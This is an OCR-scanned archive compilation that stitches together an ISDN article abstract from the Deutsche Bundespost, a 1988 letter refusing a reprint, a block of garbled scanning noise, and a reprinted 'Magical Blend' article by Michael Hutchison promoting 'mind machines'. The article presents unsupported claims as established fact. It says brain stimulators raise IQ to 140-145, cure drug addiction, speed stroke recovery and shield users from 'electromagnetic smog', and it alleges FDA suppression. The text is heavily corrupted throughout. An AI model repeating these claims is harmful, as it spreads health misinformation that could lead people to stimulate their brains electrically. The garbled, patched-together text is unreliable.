ISDN — Diensteintegrierendes digitales
Fernmeldenetz
Eine Einführung in das ISDN
Oipl.-lng. Karl Heini Rosenbrock. PDir. BPW Bonn
Ausgehend von den heutigen Fernmeldediensten, welche die DBP in verschiede¬
nen Fernmelderetzen anbietet, werden zunächst die wesentlichen technischen
Merkmale des ISDN vorgestellt, die Entwicklungsschritte zum ISDN und insbe¬
sondere die Teilnehmeranschlußleitung im ISDN. Anschließend werden die im
ISDN möglichen Dienste und Dienstmerkmale behandelt. Danach wird auf die
Bedeutung des ISDN für den Anwender. Hersteller und Netzbetreiber eingegan¬
gen. Die Pläne der DBP beim Einführen des ISDN sowie die mögliche ISDN-
Weilerertwicklung schließen den Beitrag ab.
(B 1295.D9.86 G)
Ihr Zeichen, Ihre Nachricht vom
18 . 09.88
Betreff
Unser Zeichen, unsere Nachricht vom
35 B-60 W 1776-1/4
& (0 40)
3 57- 52 59
oder 27 78
Hamburg
25 . 05.88
Ihr Nachdruckersuchen
Sehr geehrter Herr Pieper!
Von dem von Ihnen beabsichtigten Nachdruck des in den Unterrichts¬
blättern Nr. 9/1986 erschienenen Beitrags
"ISDN - Diensteintegrierendes digitales Pernmeldenetz"
bitten wir abzusehen.
Mit /freundlichen GrüQen
Grimm
5
Q
2
D
Cf ’S
U v>
01 -ö
S 2 S
Q D Q
o o o
cj CO 04
5 2
Q O
, ü) N
(Q
,-5
Ol <1>
CI
o
0
X
o
X ^
« ^
:3 S
0) X)
_fC £
DO D LU
O)
ro
C r
0) 0)
©>
■« </,
M CO
b *0
C m
§2
ö s,
■= c
CI 3
E ^
I« 2
§ O
(A
* C
.2 X
c o
(Q 0
0 ) XL
1 .
o ü
’di
2 “P <5 i>
O Q, Xt
O 1- u -
q
oSl
'^-“1
0) E I.
V
z
3
! lU
X '
0 '
(f) 0)
X c
< LU
o
$
4)
tJ
O
O
0) V) X
JO <13 O
xj w
■D </) ■'
X TJ
o c
:«} <V
C <fl
E 01
d) O)
(/) 3 O
0> M C
N P <rt
.£ ‘c ’S
LU $ S
<n i- o *-
3 .7 3
iS o ^
:i!§ O
»-En.
S o c3
:ta b. f,,
5.P
OT g n
Isf.
“ir
C (D d)
3 jc g
" « E
X o £ :
w 5 E CC
<002
c c O
a» o c
I O T3
c Ö ^
<03
<0 > =
03-7:
3 C
X s>
X O)
< 2L
J ^ 03
“ c ^
® E ?
X 3 X
OT O) (Q
TAe human louch. ln some instances, people can be more obliging than machines
New Sdentist 23 June 1988 VJ 3 Z
Dieser Beitrag ist aus dem “Magical Blend Magazine” nachgedruckt.
Wir bedanken uns für die entsprechende Erlaubnis und möchten dar¬
auf Hinweisen, daß man Probeexemplare des Magazins für 6 Dollar
oder ein JahresAbo für 20 Dollar erhält. Zahlbar in US Dollar,
US Money Order oder per Scheck (der auf eine amerikanische Bank
bezogen sein muß!). - Magical Blend Magazine, P. O. Box 11303,
San Francisco, Ca 94101, USA
By
Michael
Hutchison
electronic headpiece, flip a switch, and sink into a
slate of deep relaxation. When you remove the
headgear a half hour later you are more intelligent;
your mcmory has increascd dramatically; your brain
cells have forged new and richer interconnections;
your thinking is more lucid and Creative; your brain
itself, like a muscle that has just been pumping iron,
has become larger, more po werful. Sounds like Sci¬
ence fiction, bul in fad l've spent Ihc last fouryears
investigaling and experimenting with more than a
dozen devices that show evidcnce of having such
brain-boosting effects.
My interesi in how modern technology could be
used to Supercharge the brain was sparked by an
experience I had over a decade back. 1 was living
alone in a small log lean-to on a wildemess moun-
tainside, and would often go for wccks wilhout
speaking to another human. In the Winter, sur-
rounded by vast fie.'ds of white snow and sky, I began
to experience new things; exotic visions in my fire,
long conversations wilh a voice inside my head.
vivid memories, a flood of Creative ideas. When I did
suddenly encounter a patch of color—the red blood of a
freshly killed deer, the glittering eye of a weasel—it
seemed electrifying, magically intense. It seemed as if
my brain had shifted into some hitherto unsuspected
higher gear.
Al the same time 1 was reading neuroscientist John
Lilly’s book Center of theCyclone, adescription of his
first experiments in the mind altering environmentof a
flotation tank. It stnick me that the mental States I was
experiencing on the mountain were very similar to
Lilly’s—except while mine were a result of many
months of Isolation, Lilly's had happened within min-
utes. It was like hiking thousands of miles to find that
sorneone eise had arrived at the same destination in a
few hours by Jet: the float tank seemed to be an ac-
ceierator, a technological shortcut to heightened
awarencss. Hey, said the voice in my head, We' ve got to
check out thisßoating thing as soon as possible.
When I tried it, floating seemed to catapult me into
States of heightened awareness time after time. In-
trigued, I began interviewing neuroscientists and pored
over scientific Journals, attempting to discover what
effects floating had on brain funclioning. My research
led to the writing ofTheBookofFloating: Exploringthe
Private Sea (Morrow, 1985).
But in my talks with the scientists I discovered that
the float tank was only onc cxample of a variety of new
devices. I found there was a wholc network of neuro-
psychologists, bioelectricians, engineers and inventors,
keenly aware of the latest discoveries in neuroscience
and actively engaged in devising, testing, and putting to
use a variety of “mind-machines” that they claimed had
a Wide ränge of brain-stimulating, mind-enhancina
effects.
Studies of some of these machines indicated that
users showed dramatic improvements in IQ, memory, concentration,
reaction time, sensoiy acuity, creativity and more. Often the devices
produced peak experiences, euphoria, or “Eureka events.” One brain
reseaicher called the use of such devices “the most significant
development in leaming since the invention of writing." This, I decided,
was something worth looking into. So for several years, in addition to
investigating all the available research data on the devices, I spent
hundreds of hours trying each of them out myself. I describe these
SKploTiilionsinMegabrain: NewTools ondTechniquesfor DrainGrowth
and Mind Expansion (Morrow 1986).
But, you may wonder, how can mere mechanical devices alter such
things as intelligence, Creative skills or the physical brain? These things
are “given” to each of us, like our faces, aren't Ihey? Well, Ihat’s what
scientists had long believed. Now, however, a series of extraordinary
neuroscientific disco veries have re volutionized our view of how the brain
Works.
BRAIN EXPANSION THROUGH STIMULATION
The major discovery has been that the human brain has the potential
for immensely greater growth and transformation than anyone had
imagined. This new understanding of the brain’s remarkable p/osricüy
bcgan to emerge from a series of studies at UC Berkeley in which groups
of rats were raised in different environments; some were kept isolated in
"impoverished environments,” and some were placed in “enriched
environments"—large cages with Swings, bridges, ladders, toys,
frequently changing Stimuli, and a variety of challenges. As expected,
when tested for intelligence, the “enriched” rats scored much higher than
the others. However, the researchers were astonished to discover that the
brains of the enriched rats actually grew larger and heavier. Analysis
showed that this brain growth was caused by a growth of individual
neurons, and was accompanied by an enormous increase in the richness
and density of Connections between neurons.
These lesults were so extraordinary that the researchers themsclves
found them hard to believe, but studies by other scientists throughout the
World quickly verified the findings and went beyond them; they found
that such brain changes in response to Stimulation could take place
virtually instantaneously, and not just in laboratory animals, but in
human beings. Thcre is no longer any doubt: when presented with new,
challcnging experiences or stimulations, the brain alters, grows. As
neurobiolgist Gary Lynch of UC Irvine puts it, when the brain rcceives
ceitain types of stimulations, “just bip!—literally that long, the nerve
cireuits change and don’tgo back.”
The implications of these findings are breathtaking. Since the brain
grows in response to Stimulation, then ii should be possible to create
instruments that deliver optimal types and amounts of Stimulation
directly to the brain, feeding concentrated bursts of experience to our
neurons and, in a hothouse effect, triggering brain growth and neural
enrichment. Such mind machines could rapidly create the sort of
intensified, high-efficiency mental States produced more slowly by such
tradilional mind-expanding techniques as meditaüon, chanting, and
yoga: peak experience virtually on demand.
THE EVOLUTIONARY BRAIN
ing energy.
But there’s a further, and perhaps more important explanation. We
know the evolutionary process continues as the human race faces serious
threats to its survival. Perhaps today the humans “fittest” to survive are
not the strengest or best hunters, but those most imaginative, adaptive,
and capable of devcloping strategies to insure the survisial of the species.
The unprccedentcd problems the world faces today demand mental
Solutions, new ideas. Human survival may depend on our ability to
increase our mental powers and develop new strategies for overcoming
our present crises. Evolution involves developing new mental powers:
we have rcached “childhood’s end.” So, effective mind machines,
devices that enhance mental functioning and stimulate richer neural
interconnections, might be seen as evolutionary tools.
It is possible, then, that the growing drive toward mental enrichment,
brain Stimulation, and the exploration of our mind's potentials (what
writer Robert Anton Wilson calls the “Intelligence Intensification Ex¬
plosion”) represents theupsurge of some survival instinct from the depths
of our collective human unconscious, and may well be pari of a poten-
tially beneficial, history-determining process—one which could widen
our knowledge and, conceivably, help determine the future of the race.
Then there’s this, too: the machines are fun and fcel good! They offer
large numbers of people the opportunity to explore allered States of
consciousness safely, legally, and withou t any of the potential side effects
of mind altering Chemicals.
ln his seminal book, Prometheus Rising, Robert Anton Wilson,
discussing the “robotcycles” humans seem trapped intorepeating, Claims
that, "When the accumulated facts, tools, techniques and gadgets of
neuro-science—the Science of brain change and brain Uber ation—reach
a certain critical mass, we will all be able tofree ourselves from these
robotcycles.” He asserts that we will reach this critical mass of crossover
point in “less than ten years.” Those words were wrilten over six years
ago. 1 believe that we are leaching that critical mass now.
Here are some of the “brain liberalion” tools that are now available.
The SYNCHRO ENERGIZER is a
console about the size of a small briefease
covered with dials, to which are altachcd Stereo
headphones and goggles thatencircle each eye
with tiny light bulbs. When the machine is
turned on the uscr hears rhythmic sound
pattems that pulse in synchronization with a
stroboscopic flickering of lights. EEG studies show that brainwave
aclivity falls into rhylhm with (or becomes "enlraincd” to) the device,
fascillitaling the desired brain wave frcqucncy al the turn of a dial.
What’s more, the synergistic effect of the sound and light produces a
kalcidoscopic stream of brilliant pattems and images. Even though the
lights are white, the visions that appear are vivid, spectacular, of bright
primary colors. Often, the images bccomc realistic mind movies:
emolionally charged and dreamlike scenes. Dr. Thomas Budzynski, who
uses the device in his biofeedback clinic in Denver, has called it “a
facililalor of unconscious retrieval.” The device is now the subject of
research at over a dozen universities in such areas as education and
accelcratcd leaming. gerontology, Sports performance, pain rcduclion,
and substance abuse.
Synchro
Energizer:
Pacemaker for
the Brain
As I experimented with devices with names like the Mind Mirror,
Tranquilite, and Alphatronic I became increasingly impressed, not only
with the sheer variety of imaginative tools people have devised in Iheir
attempts to enhance mental powers, but by the facl that so many people
have feit driven to create such devices, and Ihat so many others are so
eagerto make use of them.The phenomenon seems tobe the cutting edge
of some powerful but as yet little recognized cultural drive.
The recurrent comparison of the machines with exercise and body-
building provides one explanation. As our national Obsession with
physical fitness grows, an obvious next step is a tum to mental fitness.
What use is a youihful, powerful body with a deteriorating, 97 poimd
weakling of a brain? Seen in this light, mind machines are siraply mental
counterpartsof Nautilus machines: moving frompumping iron topump-
Hemi Sync:
I Hear A
Synchrony
Radio-TV executive Bob Monroe (best
known for his book JourneysOut ofthe Body),
Irying to induce States of high-level brain
functioning, experimented with special sounds
called “binaural beat frequencies.” He found
that when these sounds, madeofeorabinations
of two or more pure tones, were introduced into
the brain. they caused the brainwave activity to fall into the same rhythm
as the beat, like acrystalgobletresonating to apure tone. Selecting sound
Signals of appropriale frequencies, Monroe could alter and entrain brain
wave activity, causing both brain hemispheres to resonate at whatever
frcqucncy he desired.
This was a valuable and revolutionary discovery. Extensive research
v‘.
Mi:
had alrcady provcn Ifiat when Ihc brain was incerlain exUaordinary States
(such as in thc depths of mcditation, al momcnls of inlcnsc crealivity or
al peak expericnccs), it produced a charactcristic pattem of brainwaves
including large quantitics of slow brain waves (called theta waves), and
shiflcd inlo a pattem in which both hcmisphcrcs functioned together (a
state neurologists called '‘synchrony”). Monroe’s discovery made it
possible to produce certain Sound pattems ihat would allow the uscr to
produce bolh hcmisphcric synchrony and to “tune" the brainwaves to
whalcvcr frequcncy was desired.
Monroe patcnled this audio brain-synchronization melhod underthe
name HKMI SYNC, and now makes it available on a variety of tape
rccordings for homc use, or in the form of a Hcmi Sy nc Synthesizer, which
can bc hooked up to a homc audio System. This Synthesizer is a powcrful
deVicc: i tcan bc adjusted to play any of a variety of beat frequcncies (such
as a combination of thcla and the ultra-slow dclta, to induce profound
relaxation; or a combination of theta with the rapid beta, to produce a
relaxed but alert state ideal for Icaming, rcading, etc.) and to play thcsc
beat frequcncies at any sound level desired (you can set it several dccibels
below thc level of the music you’rc playing. so that the Henri Sync Signals
are never audible yet still have powerful mind-altering effects).
Laboratory rcscarch into the uses of Hcmi Sync shows a variety of
brain stimulating effects, and in fad thc devicc is now being used as a lool
for increasing classroom attention and acceleraling leaming in a nuraber
of public school Systems, at universitics, and in U.S. Army languagc
schools.
We have electric-powered brains: all our
thoughts and perceptions consist of the
interactions of complcx elcctromagnelic
Systems and fields ihatconstantly sweep across
the brain, triggering the release of neuro-
chemicals. So it makes sense that shooting an
electrica! current Ihrough Ihe brain should
directly, at times radically, alter one’s mental state.
One way of doing this has comc inlo wide use in the last two decades:
Transcutaneous Electro Neural Stimulation, orTENS. TENS uniis are
widely used to alleviale pain or overcome addictions sincc thc electrical
current stimulates the nelease of the neurochemicals known as
endorphins, thc body’s natural opiates. However, according to
bioclcctricily expens, clcctrical currents can be dclivered in an infinite
number of wave shapes, frequcncies, and intcnsiiies, each onecapableof
affeciing different groups of ncurons and causing them to release
different neurochemicals. Since scicntisls now bclicve that there are a
neurochemicals mediating virlually every mental state, such as love, fear,
couragc, scrcniiy and deep concentration, theorelically it is possible, if
the device is “tuned” to the correct level, to slimulaie any mental state.
Alpha-Stirn
We Sing the
Mind Electric
ALPHA-STIIVI. One of the most effeclive TENS devices is one
developcd by neurobiologistDr. Daniel Kirsch and called the ALPHA
STIM This device operalcs al levels hundreds of times Icss powcrful, and
at a much lower frequcncy, Ihan most TENS units-producing a current
similar to the natural cunent produced by the body’s cclls, and thus abic
10 stimulalc llie cells in a morc natural way. . . , ■ i
Aside from thc thcrapcutic applications, thc device is of parlicular
intcrest to thosc intcrcsled in enhanced mental functioning when itis use
in its “iranscranial” mode; by aliaching the clectrodcs to your car o cs,
you can send cutrent directly into the brain, rapidly producing a state of
deep relaxation, heightened awareness, and a sense of well-bc.ng or
euphoria. Research now suggests that by “luning” thc bram s elcctncal
acliviiy and stimulating thc release of ncurotransmiltcrs associatcd wiih
enhanced mental performance, such devices can be used lo boost leam-
ine memory, and other mental processes.
Perhaps the most stariling and convincing studics have recently been
completed, and the extraordinary rcsults are only now being madc pub ic.
Rtrhard M adden Ph.D., of the School of Eleclromcdical Sciences of the
City University ofLos Angeles, working with Dr. Daniel Kirsch the dcan
S that school (and also the inventor of the Alpha-St.m), conducted an
- ex “nt in electrical Stimulation and leaming usmg a double-bhnd.
placcbocontrol design. Subjects were randomly assigned to two groups;
(1) an experimental group, who rcccivcd elcclroslimulalion while
leaming and performing a Computer lask; and (2) a control group, who
were also hooked up to thc elcclroslimulalion devices and rcccived thc
samc ircaimcnl as the experimental group, but did not rcceive any
electrical Stimulation. Statistical comparisons showed both groups were
inilially equivalcnl in age, education and pretreatment performance.
The experimental group rcccived 10 minutes of electrical Stimulation
while leaming and performing thc Computer task; the control group
Icamcd and performed thc task for the samc period of time, wiihoul
Stimulation. The rcsults were clear: thc group rccciving electrical Stim¬
ulation Icamcd the task, and performed the task with more speed and
accuracy than the control group. That is, the electrical Stimulation
actually improved leaming abilitics, concentration, accuracy and speed!
Another inlriguing fact came to light as Ihe results were analyzed. The
experimenters cxpecled that both groups would improve on their per¬
formance with repeated practicc and greater familiarity with the task. It
makes sense that the more you practice somclhing, the beiter you will
perform that task. However, something unexpecicd happened wiih the
control group. As Kirsch explaincd it to me, “The intcresting uncxpecled
finding was that 30.8 pcrcenl of the control group actually did worse as
ihey wem along. We cxpccicd them to do bcUcr with cach irial; ihey did
worse, due lo faliguc, inaltcntion and boredom.” On thc other hand, the
group recciving electrical Stimulation conlinued to improve and leam
over repeated trials. Somchow electrical Stimulation allcviated boredom
and fatiguc.
Maddcn and Kirsch conclude: “Since the rcsults of this study dem-
onslrale the cfficacy of TCES [Iranscranial elcclrosiimulation] in im-
proving human leaming and performance, thc possible applications of
this modaliiy seem virlually unlimiied. TCES scems well suiied to
education and training environmenis. Most directly related to this study
might be thc use of TCES by Colleges and busincss schools to teach typing
and Word processing skills morc expeditiously. Normal or leaming
disablcd childrcn mighl also be taughl morc cfficicnlly under the im-
mcdiatcor residual effects ofTCES in classroom settings.
“Morc removed from this study mighlbe thc use ofTCES in busincss
and industrial environmenis lo stimulatc cxcculivc problem solving or
improve workers’ concentration, accuracy and speed. Police officers,
automobile drivers, air traffic Controllers, surgeons, pilols, athlcles and
others sccking incrcascd alcrlncss, concentralion and performance may
benefit from TCES.”
As Kirsch lold me, "This study is extremely significant, bccause it
proves that slimulalion of thc brain can induce positive changes. People
are always scarching for ways to improve ihemsclves, and if iherc’s a safe
and easy and pro^cti melhod, then it should be used, because ii’s a
Catalyst. The brain is likc a musclc, thc morc you work it thc more you can
Icam, and thc casicr it is to leam.”
For over fiflccn years inventor Michael
Hercules worked as an acrospacc engincer
spccializing in bio-mcdical clcctrnnics and
Vibration analysis on thc Landing Excursion
Module for Ihe NASA moon shols. Hc also
served asTcsl Cond uctor for the Titan 1 project
“Düring this time,” hc told me, "I bccame
intcrcsled in thc rcsearch revcaling the many benefits of mcditation (such
as thc boosting of intclligencc, improved healing, and stress rcduciion)
and dccidcd to construct a mcchanical aid to help medilators overcome
difficullics in rcaching deep meditative States.”
Kcying on the Russian Elcctro-Slccp Machine that had aroused great
intcrest somc years ago, Hercules allcrcd and streamlincd il, and came up
wiih whal is now known as thc Pulstar, a devicc hc Claims “subliminallv
teaches control of brain-wave frequcncy by propagaiing an electronic
Signal Ihrough thc brain.” The device is about thc size of a small book
wiih an on-off switch, a knob to control thc inlcnsity of the Signal (which
is in the 5 lo 20 microampere ränge—well below the limits set bv th
FDA), a white noisc generator (according to Hercules this buffers the
The Pulstar
Mechanical
Meditation
electronic pulse wave and makes it more acceptable lo the brain), and a
frcqucncy sclccior knob which allows you to choose any frequcncy from
6 Hz (in the Theta ränge) up to 14 Hz (low Bcla). Fourelcctrodcs archcld
against Ihc skull with a headband.
The uscrselccis an approprialc frequency (the inventor’s researchhas
led him torecommend cerlain frcquencies for specificgoalsor States: e.g.
12 Hz for“ccntcring,”reiaxation and mental stabil ity; 10.5 Hzforhcaling
of the body and extreme relaxation; 7.5 for inner awareness with a sharp
sense of focus and attention, guided meditaiion and Creative thinking; and
6.3 Hz for accclerated leaming and increased memory.) Then, when the
Signal is turned on, the uscr fccls a mild pulsing. At this point, says
Hercules, "the brain locks onto and falls into Step with the frcqucncy
sclcctcd.” This entrainment, according to EEG analysis done by Her¬
cules, “lakes place throughout the entire cerebral cortex and puts both
brain hemispheres into synchronization."
Hercules notes that the device produces what we have called the
BicycleTraining Whcels Effect: “As a teaching dcvice,its main purpose
is to directly instruct the uscr how to duplicate the desired frequency at
will. Once a particular frequency has been leamed, the machine is no
longcrrcquircd."
Whilc users report that the device is effective for a variety of uses,
including accclerated leaming, stress reduction, creativity enhancement,
meditaiion, athletic or fitness training, sleep reduction, and pain control,
oneof the most inlriguing areas is thatof healing and cellular regenera-
tion. Scveral medical and scientific rescarch organizalions are investi-
gating the cffecls of Pulstar in these areas, and there are indications that
at cerlain frcquencies the device stimul ates the relcase of growth hormone
and speeds the healing and growth of cclls.
Hercules offers himsclf as an example of the Pulstar’s powers in this
arca.ln 1986 hesuffered a severestroke that, as arcsultof thedestruction
of brain cells, totally paralyzed his Icftside. “I used the Pulslar, and went
from bed to whcclchair lo walker to care lo almosl total recovery in five
weeks.” When I talkcd with him about six months after the stroke,
Hercules was preparing to go off to Mexico for scuba diving. Recovery
from such extensive deslruction of neurons clearly involves substantial
rewiring and other structural changes in the brain, establishing newroutes
of neural communication. Hercules Claims, and there is some cvidcnce to
bcar out his Claims, that the Pulstar is effective in stimulaling just such
brain growth.
One of the most highly respected figurcs in
the field of elcctromagnctics is engincer/
physicisl Dr. Robert Beck. I recently asked
Beck what was the most effective way to
producc cnhanccd mental funclioning and
allered slalcs of consciousness, and hequickly
answered “non-linear orthogonal EM ficlds.”
He cited sludies showing that propereleclrical Stimulation increased l.Q.
by 20-30 points,
Beck has invented a neuro-electrical Stimulator called The Brain
Tuner that is arousing great inlerest. Unlike adjustable devices that
deliverrelatively simple waveforms at frequencies selected by the user,
the Brain Tuneris said to emil256 siraultaneous frequencies—what the
distributor calls “all known beneficial frequencies for the natural
Stimulation of the brain’s neurotransmitters.” (According to Dr. Beck,
this is made possible by the device’s unique intcgralcd cireuits,
containing some 50 transistors and 4 diodes, that produce "nested
modulalions of short-duralion rectangular non-linear waves in pulsed
bursts.Very short rise-timesinsureharmonic output at beneficial speclral
‘Windows.”’)Thus, in acomplex inlermingling of frequencies, thedcvicc
seems to be capable of stimulating the brain lo pour out an
electrochemical cocklail (in fact one woman who was trying this dcvice
for the first time tumed to me after a fcw minulcs, her face alight with
sudden understanding, and said, “Oh, 1 .sec, il’s an clcctric martinü”)
The device seems lo be a step beyond the “Black Box” of Dr. Margaret
Cameron that gained attention scveral ycars ago when a variety of rock
Stars such as Peter Townshend and Keilh Richard used it to ovcrcomc
addictions to hcroin, alcohol, and other drugs. The Brain Tuner ilsclf has
been used successfully lo treat addictions (and rclicvc withdrawal
Symptoms) involving cocaine, herein, alcohol, and tobacco. Among the
rcsults noted most commonly by users are stress reduction, raising of
stress tolcrancc levcls, allcviation of depression and anxicly, normalizcd
sleep pattems, rcduced sleep requirement, more REM sleep, more vivid
and lucid dreams, improvement of both short term and long term memory,
improved concentralion, and increased energy levcls. Bcck laughingly
told me of a woman who had lost memory as a rcsult of ancslhcsiaduring
surgery, and ten ycars later began using the Brain Tuner. Shc was
astoni.shcd to find hcrsclf suddcnly remembering hundreds of phonc
numbers of the people shc had worked with over a decadc bcforel
The dcvice is quite simple to usc—two clcctrodcs arc applied to
acupuncture points in the hollows just bcncath the earlobcs. The clcc¬
trodcs arc plugged into a consolc smallcr than a pack of cigarettes. A
singie-knob tums the dcvice on and adjusls the inlcnsity of the slimu lation,
which fecls likc a mild, plcasanl tingling. Düring the period of usc (about
40 minutes) many people nole a mild cuphoria, and a Sensation of
increased mental energy and clarity. Theseeffects can lingcr for hours and
in some cases days.
THE ALPH ATRONIC UI. Anoihcr brain
Stimulation dcvice many users are finding
effective is the Alphatronic 111 designed by
elcctrical engincer Lowcll Pope. Unlike the
Brain Tuner, this lililc box delivers a modified
sine waveatan cxtrcmcly low ampliludc (in the
microamperage ränge, about 100 times bclow
normal ncuro-firing levcls). Pope insisLs that this is a key lo its
effcclivcness: “Il’s not ’driving’ or ’entraining’ the brain's elcctrical
activiiy," hc says, "bui inslcad is gently, subtly stimulaling the brain in a
way that is very natural, and is pcrccivcd by tlrc brain not as somclhing
cxlcmal bul as a pari of its own aclivity.”
The dcvice is about the size of a box of stick matches, and has a
frcqucncy sclcctor knob which allows you to choose any frcqucncy from
2Hz(in the Delta ränge) up lo 12 Hz(high Alpha).Two clcctrodcs arc
placedagainstthcmastoid bonc bchind Ihcear. Most users will not bcablc
The
Brain Tuner
The Electric
Martini
Alphatronic
III
Subtly
Stimulating
MARCUS BAOGLEY
they sccrti to actually entrain Ihe brainwaves of many people. One such
dcvicc now availablc is the MOOD PACERII. Unlike the neuro electric
Stimulation dcvices, the Mood Pacerdocs notrequire electrodes attached
10 the head or body. In fad, the field produced by the pacer—a wirelcss,
battcry-powered box about Ihe size of a bar of soap—can be effcctive
scvcral fect from the dcvice. However, while virlually everyone is
affeded by direct eledrical Stimulation, it seems thal only about 35
pcrcent of subjects tested are sensitive Io magnetic brainwave pacing.
We have already discussed the possible benefits of entraining brain¬
waves throughou t the whole brain. Il should be noted that the Mood Pacer
11 pulsates—and entrains brainwaves—at a frequency of 7,83 Hz.This is
also known as the “Schumann resonance.” This has been found to be one
of those "window" frequencies that appear to have a widc ränge of
bcneficial effccls on humans, ranging from reports of enlianced healing
U 3 accclcralcd leaming. When a biological System vibrates at this fre¬
quency, it can be said to be in a state of resonance or entunement with the
planct’s own magnetic frequency, and it is perhaps this rhythmic unity
wiih whai has been callcd the earlh’s “natural brainwave” that produces
such profound effects. Bob Beck explained itin terms of Bohm’s theory
of the Holographie brain—“If you can ping a specific element of that
hologram you can ping the entire structure, said Beck. In this case,
using this wcak pulse ai 7.83 Hz you can ping the whole structure and have
very dccidcd cffccLs.”
ln addiiion to entraining brainwaves, the magnetic pulse gcncrator
scems lohaveolhcr benefits. Inrecentyearsourcivilizationhasimmersed
iisclf in a dense elcctromagneüc “smog" of conflicting electromagnelic
intcrfcrcncc and man madc radiation “noise," including microwave and
to focl any clcctrical tingling, but when used for 20 to 40 minutes while
remaining quict, prcfcrably in a meditative state, the effccls are siriking
and long lasling. Most users cxpcriencc an immcdiaie sense of change.
Expcricnccd mcdilators claim it helps them enter the deepest meditative
Stales very quickly. It has also proven effcctive in producing focussed,
highly alert States effcctive for reading or work.
A rccent issue of the Psychoiherapy Newsletter was largely devoted
10 an cxploration and discussion of this device, and the authors noted that
it seemed effcctive in reducing blood pressure of hypertensives, reduced
anxicly, produced a state similar lo a mild hypnolic trance, increased
ability to conccntrale, and they concludcd il“may well revolutionize the
practice of psychoiherapy by making significant inroads into the use of
biofccdback and Chemicals as adjuncLs to 'the talking eure.’”
EndomaX Endomax, rccently dcscribed in
Magical Blend (Issue #15), plugs into a
Walkman-likc cassette playcr. An endlcss tape
Electronic loop plays in the cassette playcr, butlhereisa
Sedative or special adaptor that iransforms the sound
Stimuiant frequencies of the tape into electrical
frequencies that are dclivered lo the brain
ihrough electrodes placcd on the mastoid boncs-ITius far inventoried
Alsop provides four different tapcs/frequcncies: one stimulaling the
rclcasc of endorphins, onc to Irigger the mood elevatingneurotransmitler
norepinephrine, one rcleasing sedative neurolransmitlers that are our
natural Valium and Librium, and one which is an energizing stimuiant,
rcleasing norepinephrine as well as dopamine or so Alsop Claims.
Mood technique of electrical Stimulation that
has aroused great inlercst among scientists in
POCOr II rccent years is the use of pulsed
Healinn elcctromagnetic fields (PEMF). Used by
Enhanced Heal g „umbers of orthopedic surgeons 10
& Accelerated ^g^bat such common bone diseases as osteo-
Learning porosis and “ununited" fraclures (broken bones
thal won’l heal), PEMF also seem lo have the property of entraining or
“Pacing” ihe body's cells by activating sensitive neuronal receptors.
When ihcsc PEM Fs are luned to frequencies in the human EEG ränge.
radar, causingour cells to lose contact with many natural micropulsations
andelcctromagnctic fields. Research hasproven that this elcctromagnetic
pollulion can have a wide ränge of harmful effccls. As Bob Beck
dcscribed ilto me, "Man as abiocosmicresonator is exlrcmcly sensitive
to EM fields.” Bui magnetic pacers can apparcnlly act as a
counlcrmeasure lo this environmental electromagnelic pollulion.
AUhough the Signal sirenglh of ihe pacer is slighl (only milliwatts, or
ihousandihsof a wall) ihcre seemto be mechanisms in living tissue, such
as long-chain liquid-crystal dipolcs, thal exhibit supcrconductivc
characlcrislics that ullow Ihc PEMFs to override the dcslructive envi¬
ronmental elcctromagnetic noise pollulion. Bccause the device is dose lo
ihc uscr's body, its wcak signul overrides rauch stronger sourcos ai a
distancc.
Many invenlors and olhcrs involvcd in the use of EM dcvices believe
thal Ihe FDA and other powers thal be are trying to suppress the use of
such dcvices. As Bob Beck told me, “At this poinl we could be on ihe
vergeof a giant sicp in human evolulion. We’rc only operaling at a small
perceniagc of our potential, and EM Stimulation can have powerful
effects. However, vcslcd intercsts are always opposed lo change, whether
it’s free energy or a bcllcr carburcior. But morc and moro people arc
bccoming aware of Ihc possibilily of thcsc things. 1 hcre’s an explosion
of informalion. Al this poinl an informed public is the best safeguard.”
This rcccnily dcvcloped dcvice is billed by
its inventor. Keiih Simons, as “the ultimaie
brainwave enlrainmenl dcvice.” It uses a
variety of mind altering forces lo allow the uscr
to control, or “entrain’' brainwave aclivity
First, it uses a very low amplitude sine wave
that is very similar lo that of the Alphatronic lll
which is sent directly into the brain via several electrodes placed on the
head. To that it adds a PEMF thal pulsates at the samc frequency as the
electronic Signal. In addiiion, it uses slroboscopic lighls and pulsaiing
Sounds in synchronous rhyihm with the electrical wave and PEMF
Simons Claims that “the morc sensory inputs into the ccnü'al nervous
System ihat are synchronized al the same frequency, the grcaler the
entrainment produced."
Since the Alphapaccr 11 can bc adjusted to frequencies in both the
alpha and iheta ränge, it is quite efficient in producing altered States of
consciousness that fealure colorful visualizations, intense and spontane
ous memories, deep relaxation, sudden Creative insights, and so on
AlphaPacer
II
Altsred States of
Consciousness
As babies we are rocked. As kids we roll
down hills, spin unlil we’re dizzy, ride roller
coastcrs. As adults we scuba dive, skydive,
hang glide, drive fast, dance like mad, and,
whcn tired, sit in rocking chairs. According lo
elccirical enginecr/invcntor David Graham,
such movc mcntsarcnotonlyfunbut esscnti al:
Ihcy slimulale our brains, and, in high doscs, thcy can incrcasc
intclligence. He has invcnicd a device, thc Graham Potcntializcr, to do
just Ihat.
The device appears to be a modest cot with a motorconcealed beneath
it, and a large box at Ihe head, As the user lies back on the cot the cot
rcvolves—the user rises and falls rhythmically ihrough a circle. The
movement is smoolh, and fcels very good. With each cycle the user
revolves through the elcciromagnetic field produced by the box at the
cot’s head.
EEG Studios of the effects of the device indicate that the machine
induccs Sharp increascs in thc produclion of slow brain waves, shifts
hemispheric dominancc (resulting in a balancing of the two hemis-
phercs), and, most inlriguingly, optimizes the neural efficiency quotient
(NEQ), a mcasurc of how rapidly elccirical Signals are transmitted
by Ihe brain’s neurons—a characleristic that has conelated very
closcly to IQ scores. Says Graham, the device “can increase the
intclligence or mental funclioning of a normal adult—someone with
an average IQ—lo an IQ of about 140-145.”
To explain these benefits, Graham suggests that the rotating
affectslhe fluids that compose about 90 percentof our bodyvolume,
and particularly the fluids of the vestibulär or inner ear System. ‘The
millions of nerve endings in your inner ear,” says Graham, "resppnd
to movement with electrical responses that are carried throughout
the brain, triggering an enormous amount of neural activity. This
neural activity is of an uncommon sott, not only stimulating many
different parts of the brain, but causing the neurons to forge new
Connections. So what the rotation is really doing is ‘exercising’ the
brain—allcring and incrcasing the flow of neuroelectricity and
ncurochcmicals to large arcas of the brain. The first ihing this kind
of vestibulär Stimulation docs is bring about a dramatic increase in
yourmotor and Icaming capabilitics. In other words, the ‘exercise’
has a brain building cffect, just as physical exercise has a body-
One mind altering tool many of us are
familiär with is thc flotation tank. One of the
variely of ways flotation can boost Icaming
abilities is by dramatically increasing the
